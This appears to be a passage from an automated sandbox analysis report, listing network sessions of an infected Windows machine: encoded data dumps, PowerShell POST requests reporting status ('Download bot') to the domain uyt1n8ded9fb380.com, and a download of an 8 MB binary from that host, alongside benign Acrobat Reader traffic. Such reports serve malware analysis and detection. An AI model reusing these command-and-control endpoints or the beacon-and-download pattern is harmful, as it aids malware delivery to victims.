                                                                                                                          2024-11-08 09:58:24 UTC1369INData Raw: 57 6c 79 60 53 30 5b 73 52 30 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 54 6f 6d 6d 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 71 4b 53 54 34 77 56 6d 65 4e 62 6a 6d 49 63 46 30 4b 52 47 4b 77 56 6d 4f 42 60 30 71 58 55 6b 43 69 57 7b 57 6e 5b 44 65 72 65 6c 4b 71 50 6c 30 69 57 32 69 72 52 54 65 46 62 33 4f 75 57 6c 69 60 52 46 75 6f 56 6d 69 6e 62 46 4c 7b 54 6f 71 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 62 47 71 71 50 56 38 56 53 30 5b 37 5b 44 4c 79 54 57 6d 58 54 6c 38 4b 50 7b 47 53 56 57 69 52 63 31 6d 45 54 6c 75 60 56 44 35 76 58 57 62 30 60 46 53 49 63 49 5b 68 60 54 47 31 57 54 65 46 4c 46 47 46 54 6b 57 6b 53 30 57 6f 57 44 65 56 60 47 71
                                                                                                                          Data Ascii: Wly`S0[sR0OBO1SSc3eKP1GoRTOC[1mHTommT1H2SGGw[1mEPVeKP1GoRTOC[1mEPVqKST4wVmeNbjmIcF0KRGKwVmOB`0qXUkCiW{Wn[DerelKqPl0iW2irRTeFb3OuWli`RFuoVminbFL{ToqDTV8oRTOC[1mEPVeKP1GoRTOBbGqqPV8VS0[7[DLyTWmXTl8KP{GSVWiRc1mETlu`VD5vXWb0`FSIcI[h`TG1WTeFLFGFTkWkS0WoWDeV`Gq
                                                                                                                          2024-11-08 09:58:24 UTC1369INData Raw: 54 4f 43 5b 31 71 49 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 30 54 7b 57 6c 71 5b 4c 6d 5b 72 56 6a 65 56 60 31 6d 44 4c 46 65 53 4c 6b 6d 30 5b 46 30 56 64 56 53 45 4c 54 65 69 57 32 69 72 57 6b 4b 72 4c 46 47 46 60 49 5b 6b 60 54 47 31 54 30 62 30 65 33 53 58 54 6a 65 69 57 32 69 72 57 54 65 46 4c 46 47 45 50 56 75 6a 53 30 5b 31 58 31 57 60 62 46 4b 49 57 56 65 4c 57 55 6a 79 5b 44 69 42 4c 56 53 47 56 6f 43 68 53 30 5b 53 56 57 69 52 63 31 6d 45 54 6c 75 60 56 44 35 76 58 57 62 30 60 46 53 49 63 49 5b 68 60 54 47 31 57 31 62 34 64 57 4c 78 57 6b 57 4b 53 44 54 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 31 57 72 50 30 57 72 56 6a 38 54 63 47 5b 4f 57 30 4f 43 60 57 4b 49 57 6b 43 60 57 32 69 72
                                                                                                                          Data Ascii: TOC[1qITo[jLkW{XkKF`0T{Wlq[Lm[rVjeV`1mDLFeSLkm0[F0VdVSELTeiW2irWkKrLFGF`I[k`TG1T0b0e3SXTjeiW2irWTeFLFGEPVujS0[1X1W`bFKIWVeLWUjy[DiBLVSGVoChS0[SVWiRc1mETlu`VD5vXWb0`FSIcI[h`TG1W1b4dWLxWkWKSDT2SGGw[1mEPVeKP1GoRTOC[1mEPVeKP1GoW1WrP0WrVj8TcG[OW0OC`WKIWkC`W2ir
                                                                                                                          2024-11-08 09:58:24 UTC517INData Raw: 53 68 4c 30 5b 30 5b 44 4f 43 65 46 4b 48 54 56 65 4a 53 7b 47 6e 5b 54 5b 4a 63 46 53 48 52 6f 43 60 56 44 30 76 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 56 57 4f 57 52 6d 4f 56 60 7b 57 51 57 6d 57 35 56 6a 6d 45 52 6d 4f 60 56 47 4b 34 5b 57 65 72 65 57 71 34 50 6c 75 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 6f 43 68 60 54 47 73 58 33 30 56 4c 46 4f 74 63 44 57 60 57 32 69 6e 5b 57 57 72 65 57 54 78 57 6c 71 68 4c 6b 57 73 58 32 6d 42 64 6d 71 59 55 6f 5b 68 63 57 4b 37 55 46 6a 31 65 54 6d 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 55 6b 43 5b 56 44 6e 76 55 47 5b 4e 62 30 71 59 57 6f 65 4b 50 7b 47 54 56 6d 65 4e 65 6c 4b 75 54
                                                                                                                          Data Ascii: ShL0[0[DOCeFKHTVeJS{Gn[T[JcFSHRoC`VD0vRTi{UjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOBVWOWRmOV`{WQWmW5VjmERmO`VGK4[WereWq4PluhL3S0Xjb4`GqEPoCh`TGsX30VLFOtcDW`W2in[WWreWTxWlqhLkWsX2mBdmqYUo[hcWK7UFj1eTmoLDuKP1GoRTOC[1mEPVeKP1GoRTOC[1mFUkC[VDnvUG[Nb0qYWoeKP{GTVmeNelKuT
                                                                                                                          2024-11-08 09:58:25 UTC1369INData Raw: 37 52 54 69 4a 63 46 53 48 52 6f 43 60 56 44 30 30 52 56 62 76 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 35 76 55 6a 4f 72 60 44 71 53 63 44 71 59 57 46 72 30 57 6d 53 46 60 33 65 4b 63 44 34 7b 56 6d 65 56 65 31 6d 44 53 59 65 6b 64 54 6a 32 53 47 47 76 57 46 53 49 53 6f 6d 6a 50 7b 47 54 58 6a 65 56 63 46 4f 45 50 59 53 57 4c 6d 5b 70 58 6b 48 30 60 33 4f 34 50 59 69 4f 53 49 4f 4e 50 33 79 6e 52 6d 47 72 52 6d 65 54 60 7b 57 56 57 44 5b 73 5b 31 6d 73 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 31 6d 49 52 6f 5b 6a 50 31 6a 32 53 47 47 76 53 56 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4c 79 53 33 47 59 64 46 79 56 4c 6c 76 76 58 54 5b 4a 63 46 53 48 52 6b 57 4b 50 7b 44 79 58 33 30 32 5b 31 6d 75 60 45 43 6a 52 44 4b 37 55 33 6a 35 65 6c 53 58 63 45 43 4f 57 7b
                                                                                                                          Data Ascii: 7RTiJcFSHRoC`VD00RVbvR1mEPVeKRECNP35vUjOr`DqScDqYWFr0WmSF`3eKcD4{VmeVe1mDSYekdTj2SGGvWFSISomjP{GTXjeVcFOEPYSWLm[pXkH0`3O4PYiOSIONP3ynRmGrRmeT`{WVWD[s[1msTo[jLkW{XkKF`1mIRo[jP1j2SGGvSVH{[IWhS{mnVjLyS3GYdFyVLlvvXT[JcFSHRkWKP{DyX302[1mu`ECjRDK7U3j5elSXcECOW{
                                                                                                                          2024-11-08 09:58:25 UTC1369INData Raw: 63 49 71 6a 53 30 5b 34 55 47 5b 4e 60 6c 47 49 57 6c 75 6a 57 32 69 72 56 6a 5b 52 60 46 4c 78 62 33 65 4c 57 6d 4b 6e 58 7b 4b 31 55 30 6d 59 4c 56 79 4b 50 31 6e 33 57 55 4b 56 64 56 53 75 63 46 71 60 57 31 34 6e 58 55 48 34 62 44 30 54 50 56 6d 4b 50 7b 47 44 58 6b 48 30 63 56 47 58 52 6f 53 51 60 57 4b 75 56 57 65 35 64 6d 71 54 62 31 34 45 63 44 71 72 56 6b 4b 72 64 6c 53 49 57 6f 6d 4c 57 6a 34 70 58 54 65 56 60 33 53 59 64 46 79 60 53 6d 4b 6e 58 7b 4b 7b 5b 31 79 57 53 6c 71 6a 53 33 79 33 58 6c 6d 43 60 30 6d 59 55 6b 43 69 57 7b 6d 30 52 54 4c 79 54 56 4f 75 63 49 57 5b 4c 6c 79 32 56 57 65 32 5b 31 71 48 50 6f 6d 69 57 7b 57 70 58 57 69 42 60 46 4b 45 50 59 53 56 52 44 71 76 56 6b 4b 6a 63 46 4f 71 50 56 75 6a 52 44 71 76 56 6b 4b 6a 63 46 4f
                                                                                                                          Data Ascii: cIqjS0[4UG[N`lGIWlujW2irVj[R`FLxb3eLWmKnX{K1U0mYLVyKP1n3WUKVdVSucFq`W14nXUH4bD0TPVmKP{GDXkH0cVGXRoSQ`WKuVWe5dmqTb14EcDqrVkKrdlSIWomLWj4pXTeV`3SYdFy`SmKnX{K{[1yWSlqjS3y3XlmC`0mYUkCiW{m0RTLyTVOucIW[Lly2VWe2[1qHPomiW{WpXWiB`FKEPYSVRDqvVkKjcFOqPVujRDqvVkKjcFO
                                                                                                                          2024-11-08 09:58:25 UTC1369INData Raw: 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 34 68 53 7b 6d 71 56 57 65 32 4f 6d 48 79 57 6c 47 54 57 6d 71 57 54 6b 47 72 52 30 57 71 50 59 4b 50 54 31 47 71 55 47 4c 76 65 44 79 55 4c 49 53 4c 54 7b 43 31 55 47 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 54 6f 6d 6d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 75 5b 63 55 6d 73 5b 57 4f 43 4e 54 6d 45 54 6c 34 68 53 7b 6d 71 56 57 65 32 4f 6d 48 79 57 6c 47 54 57 6d 71 57 54 6b 47 72 52 30 57 71 50 6b 69 4b 53 54 34 33 58 6c 34 60 63 46 4f 74 54 6d 57 68 64 55 47 4d 58 7b 48 34 65 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 30 62 30 4c 6c 48 78 65 46 79 4c
                                                                                                                          Data Ascii: 1GoRTOC[1mETl4hS{mqVWe2OmHyWlGTWmqWTkGrR0WqPYKPT1GqUGLveDyULISLT{C1UGOKO1SSc3eKP1GoRTOC[1mHTommTUCMRTOC[1mEPVeKP1H2SGGw[1mEPVeKP1GoRTOC[1mEPVu[cUms[WOCNTmETl4hS{mqVWe2OmHyWlGTWmqWTkGrR0WqPkiKST43Xl4`cFOtTmWhdUGMX{H4eT82LDuKP1GoRTOC[1mEPVeKP1GoT0b0LlHxeFyL
                                                                                                                          2024-11-08 09:58:25 UTC1369INData Raw: 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 4b 49 58 57 65 35 63 47 53 75 53 6f 53 60 54 31 44 34 52 54 4f 4a 63 46 4b 58 50 6b 43 6d 54 7b 54 76 5b 54 69 53 60 54 6d 45 50 56 71 4b 53 57 4b 72 56 6c 30 46 4c 56 4b 48 54 56 65 60 63 56 79 7b 56 6d 4f 42 65 57 6d 59 4c 56 79 4b 53 33 79 75 52 54 62 30 65 6c 53 45 50 6f 71 6b 53 30 5b 70 58 57 65 60 62 47 71 59 54 54 34 45 60 54 47 6f 52 54 4f 43 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 5b 46 79 6a 50 31 48 76 58 54 65 57 5b 33 53 49 57 6f 53 6b 53 7b 6d 34 56 57 69 4a 4f 54 6d 49 56 6f 5b 68 53 30 4b 72 58 33 6d 42 65 30 6d 58 54 6c 38 44 54 56 38 6f 52 54 4f 43 5b 31 71 48 54 6c 79 68 56 44 4b 49 58 6b 4b 35 60 30 71 58 52 56 65 50 54 31 4b 68 57 55 4f 72 64
                                                                                                                          Data Ascii: mEPVeKP1KhX{ORdVGYOV4XT0KIXWe5cGSuSoS`T1D4RTOJcFKXPkCmT{Tv[TiS`TmEPVqKSWKrVl0FLVKHTVe`cVy{VmOBeWmYLVyKS3yuRTb0elSEPoqkS0[pXWe`bGqYTT4E`TGoRTOCbDSSc14E`TGoRTOC`jmG[FyjP1HvXTeW[3SIWoSkS{m4VWiJOTmIVo[hS0KrX3mBe0mXTl8DTV8oRTOC[1qHTlyhVDKIXkK5`0qXRVePT1KhWUOrd
                                                                                                                          2024-11-08 09:58:25 UTC1369INData Raw: 7b 56 57 69 72 55 30 6d 59 4c 56 79 4b 50 7b 47 72 58 30 4f 43 60 57 58 78 63 49 57 60 53 7b 6a 7b 58 32 6d 42 53 57 71 59 56 6c 79 68 63 57 4b 72 58 33 6d 4b 5b 33 5b 53 4c 44 75 44 54 56 38 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 65 46 65 56 57 55 50 6f 5b 6a 53 33 69 72 58 33 6d 42 60 46 4b 74 54 6f 43 6a 63 56 79 34 5b 47 69 4f 5b 33 4c 78 4e 56 30 6a 52 46 53 6e 58 33 30 57 5b 33 47 58 55 56 65 69 57 7b 57 37 5b 44 65 46 62 33 4b 49 57 6c 75 44 54 56 38 73 58 6b 4f 52 63 30 71 58 52 6a 4b 68 63 6d 4b 76 5b 46 30 72 64 56 53 58 55 56 65 50 54 31 4b 48 56 6d 69 53 65 47 58 78 4c 59 43 54 4c 6a 71 79 56 6d 65 4e 4c 44 6d 45 4c 54 38 5b 57 7b 47 72 58 7b 4f 42 60 47 6a 78 57 56 65 4b 63 44 71 33 58 6b 4f 52 58 30 54 78 57 6c 71 6a 56 44
                                                                                                                          Data Ascii: {VWirU0mYLVyKP{GrX0OC`WXxcIW`S{j{X2mBSWqYVlyhcWKrX3mK[3[SLDuDTV8pRTWNc0qYUoKKS3yuRTeFeVWUPo[jS3irX3mB`FKtToCjcVy4[GiO[3LxNV0jRFSnX30W[3GXUVeiW{W7[DeFb3KIWluDTV8sXkORc0qXRjKhcmKv[F0rdVSXUVePT1KHVmiSeGXxLYCTLjqyVmeNLDmELT8[W{GrX{OB`GjxWVeKcDq3XkORX0TxWlqjVD


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.11.3049739172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:25 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 140
                                                                                                                          2024-11-08 09:58:25 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 44 79 6c 61 6e 65 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                                                          2024-11-08 09:58:26 UTC918INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:26 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5SqQjn0oRRUZAsKOjXlbZscsenbc8nUdeSIHGd8CyeQbrXl2H9GR0hthKfL0XmVREWmFXc4OeK2AoSooxJg5UocZzlPcz43%2Bdmu592e9QuktY6MpPofwWrk8Sp9xBlemgAD%2FsSJPVqt"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1297&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=934&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b45aaf284240-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=102146&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1090&delivery_rate=37458&cwnd=252&unsent_bytes=0&cid=233b7a24beaeb762&ts=858&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.11.3049744172.64.41.34434308C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 128
                                                                                                                          Accept: application/dns-message
                                                                                                                          Accept-Language: *
                                                                                                                          User-Agent: Chrome
                                                                                                                          Accept-Encoding: identity
                                                                                                                          Content-Type: application/dns-message
                                                                                                                          2024-11-08 09:58:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                          2024-11-08 09:58:29 UTC247INHTTP/1.1 200 OK
                                                                                                                          Server: cloudflare
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:29 GMT
                                                                                                                          Content-Type: application/dns-message
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Content-Length: 468
                                                                                                                          CF-RAY: 8df4b473bc9c4216-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-08 09:58:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: wwwgstaticcom&Pc)


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.11.3049743172.64.41.34434308C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 128
                                                                                                                          Accept: application/dns-message
                                                                                                                          Accept-Language: *
                                                                                                                          User-Agent: Chrome
                                                                                                                          Accept-Encoding: identity
                                                                                                                          Content-Type: application/dns-message
                                                                                                                          2024-11-08 09:58:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                          2024-11-08 09:58:29 UTC247INHTTP/1.1 200 OK
                                                                                                                          Server: cloudflare
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:29 GMT
                                                                                                                          Content-Type: application/dns-message
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Content-Length: 468
                                                                                                                          CF-RAY: 8df4b473b9131768-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-08 09:58:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ca 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.11.304974523.41.168.1394434308C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:35 UTC470OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                                          Host: armmf.adobe.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          If-None-Match: "78-5faa31cce96da"
                                                                                                                          If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                          2024-11-08 09:58:36 UTC198INHTTP/1.1 304 Not Modified
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                                          ETag: "78-5faa31cce96da"
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:36 GMT
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.11.3049746172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:37 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321189bbf40e93b36f1509e1bece2e4505fef HTTP/1.1
                                                                                                                          Content-Type: application/json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          Content-Length: 69
                                                                                                                          2024-11-08 09:58:37 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                          Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                                                          2024-11-08 09:58:38 UTC928INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:38 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kHi1sPFf3JfjD3JKp3kmYmSgbYOzstsWeU6PqmuaPmsWzlK%2F6d5WJ0YbSYzwDAJRDNyOgfDq3XzkUUk9ScpfRXbQXx1QQg1tBlUZPfStMZiVTX1zr3pVPQTm%2Fdy8jBO3rCIjY9VrkpIa"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=21081&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2200&recv_bytes=4212&delivery_rate=27262&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b4a6e816c553-IAD
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=113710&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1018&delivery_rate=34482&cwnd=88&unsent_bytes=0&cid=5c8d639b92b5afdf&ts=822&x=0"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.11.3049747172.67.137.624434780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-08 09:58:38 UTC338OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329b887232148c7de62a277aa7bb9f7bb172d0ba0fe9be28b36313fd0fe9b172de332f05512cd1a8b06a678d6fb6ee2d640939cb40f267bbf685fe9daffed49f6 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                          Host: uyt1n8ded9fb380.com
                                                                                                                          2024-11-08 09:58:39 UTC1064INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 08 Nov 2024 09:58:39 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 8351232
                                                                                                                          Connection: close
                                                                                                                          content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNz7B%2FrlZ3XmeUzw5zAikabENaInInxjeiL1ATzqxyju8qdCajF%2BA7cA%2BFHmaJdHe3AXx1%2Bz7jMsfFKVKMa3ZEjWbtxauMKCJfqU5PwE3Y977B5yAxWrnQFtxM0r4rpXgqldQ3rwLp2r"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9940&sent=17475&recv=8794&lost=0&retrans=11&sent_bytes=24628629&recv_bytes=74495&delivery_rate=63548209&cwnd=264&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          X-Powered-By: ARR/3.0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8df4b4adadc74276-EWR
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=108730&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=976&delivery_rate=37464&cwnd=252&unsent_bytes=0&cid=2010cbd7819303ae&ts=831&x=0"
